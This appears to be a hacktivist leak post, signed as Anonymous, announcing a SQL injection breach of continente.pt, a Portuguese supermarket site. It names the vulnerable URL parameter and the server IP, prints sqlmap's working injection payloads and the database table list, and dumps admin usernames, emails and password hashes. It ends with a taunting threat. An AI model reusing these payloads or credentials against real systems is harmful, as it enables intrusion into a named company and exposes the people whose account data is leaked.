continente.pt - Dbase dumped - Continente Portugal

1. Hello,
2. We are Anonymous and We are Inside your System, We are Unexpected
3.  
4.  
5. Continente Hipermercado - Portugal
6.  
7. Target --> Security ---> 0
8.  
9. domain: continente.pt
10. cname: popota.continente.pt A 212.0.160.211
11.  
12. Exploit: SQL |--===--- injection
13.  
14.  
15. --
16. Place: GET
17. Parameter: gameid
18. Type: boolean-based blind
19. Title: AND boolean-based blind - WHERE or HAVING clause
20. Payload: gameid=popomemoria' AND 6231=6231 AND 'PYbW'='PYbW
21.  
22. Type: UNION query
23. Title: MySQL UNION query (NULL) - 11 columns
24. Payload: gameid=popomemoria' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71696d7871,0x766f6364506c6552714d,0x7169767471),NULL,NULL#
25.  
26. Type: AND/OR time-based blind
27. Title: MySQL > 5.0.11 AND time-based blind
28. Payload: gameid=popomemoria' AND SLEEP(10) AND 'UzRE'='UzRE
29. ---
30. web application technology: Apache
31. back-end DBMS: MySQL 5.0.11
32. available databases [2]:
33. [*] continente_popota
34. [*] information_schema
35.  
36. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
37. ---
38. Place: GET
39. Parameter: gameid
40. Type: boolean-based blind
41. Title: AND boolean-based blind - WHERE or HAVING clause
42. Payload: gameid=popomemoria' AND 6231=6231 AND 'PYbW'='PYbW
43.  
44. Type: UNION query
45. Title: MySQL UNION query (NULL) - 11 columns
46. Payload: gameid=popomemoria' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71696d7871,0x766f6364506c6552714d,0x7169767471),NULL,NULL#
47.  
48. Type: AND/OR time-based blind
49. Title: MySQL > 5.0.11 AND time-based blind
50. Payload: gameid=popomemoria' AND SLEEP(10) AND 'UzRE'='UzRE
51. ---
52. web application technology: Apache
53. back-end DBMS: MySQL 5.0.11
54. available databases [2]:
55. [*] continente_popota
56. [*] information_schema
57.  
58. Database: continente_popota
59. [29 tables]
60. +----------------------------+
61. | admin |
62. | admin_passatempo |
63. | cities |
64. | event_calendar |
65. | event_gallery |
66. | hypnotic_albums |
67. | hypnotic_items |
68. | hypnotic_media |
69. | hypnotic_photos |
70. | languages |
71. | music_studio_gallery |
72. | participation |
73. | participations |
74. | participations_1 |
75. | participations_2014 |
76. | pastime_cast_participation |
77. | pastime_cast_vote |
78. | product |
79. | product_category |
80. | score |
81. | share |
82. | tour_gallery |
83. | tour_locality |
84. | tranlations |
85. | vote |
86. | votes |
87. | votes_1 |
88. | votes_2014 |
89. | zones |
90. +----------------------------+
91.  
92. -- Dump POC:
93.  
94. Database: continente_popota
95. Table: admin
96. [3 entries]
97. +----------+----------------------------------+------------+-----------------+---------------------+
98. | admin_id | admin_pass | admin_user | admin_name | admin_email |
99. +----------+----------------------------------+------------+-----------------+---------------------+
100. | 1 | bd0a5b3695f1f7e0e719784aa497262d | havasww | Havas Worldwide | dev@havasww.com |
101. | 2 | 28a862f30430f446dfc624ed978e1b3d | continen | Continente | geral@continente.pt |
102. | 3 | 7a03631972e76b4adc845472a0bcc742 | idv | idv | idv |
103. +----------+----------------------------------+------------+-----------------+---------------------+
104.  
105.  
106. do not forget, make the wrong move, and we have your information... game over :P
107.  
108. Player 2
109. 8====D